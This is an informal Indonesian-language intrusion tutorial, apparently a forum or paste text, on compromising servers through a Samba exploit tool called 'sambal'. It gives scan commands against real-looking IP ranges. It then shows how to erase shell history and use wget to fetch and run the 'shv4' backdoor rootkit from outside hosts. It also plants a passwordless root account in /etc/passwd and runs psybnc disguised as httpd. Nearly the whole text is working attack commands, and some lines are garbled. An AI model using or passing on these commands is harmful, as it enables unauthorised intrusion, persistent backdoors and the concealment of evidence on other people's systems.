contoh comqand dari beberapa shell ssh scan (samba) .. 1. login your shell - cd /var/tmp/" " ( tempat dimana taruh shel nya ) - tergantung dari mana ngambil exploitnya - ex : dari pathygeni 202.107.52.170 ssh 6667 mails/s3n7h0d - cara jalankannya * cd /var/tmp/" " * ls -al * silahkan pake * ketik ./sambal -d 0 -C 60 -S 210.139.10 * keterangan Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (default = 300) -c connectback ip address -C max childs for scan/bruteforce mode (default = 40) -d bruteforce/scanmode delay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode kemudian perhatikan apa kah ada yang di scan sambal ex: [210.139.102.96] Samba apa bila anda menemukan samba kemudian ketik coman buat scan sambanya ./sambal -b 0 IPnya kalo udah dapet ketik unsethistfile then ./setup nama port; unset HISTFILE; wget www.purwokertocity.com/shv4.tar.gz; tar zxvf shv4.tar.gz; cd shv4; ./setup kelana 7000; unset HISTFILE; exit; ketikan yang diatas jika kamu perlu / mau memasang backdoor jika apabila shell yang di dapet tidak mau wget ketik lynx ./sambalx -b 0 -v 212.244.5.249 Buat add user jika ndak mau di wget cat /etc/passwd/ /usr/sbin/useradd arpa2 -m -d /etc/.arpa2 /passwd linux echo "admin::0:0::/etc/.arpa2:/bin/bash" >> /etc/passwd su bash wget www.purwokertocity.com/shv4.tar.gz; tar zxvf shv4.tar.gz; cd shv4; ./setup kelana 7000; unset HISTFILE; exit; 211.75.201.34 http://ghyga.net/bak/ps >>>> psybnc <<< wget kelik-pelipur-lara.org/psybnc/prepsybnc.tar.gz; tar zxvf prepsybnc.tar.gz; rm -rf prepsybnc.tar.gz; cd kaka; ./kik usr/sbin/httpd ./psybnc psybnc.conf nando baa caronyo kalo liak web dalam shel apo comannyoi arp -n ehh di named.conf find / | grep named.conf mode itu cat /etc/named.conf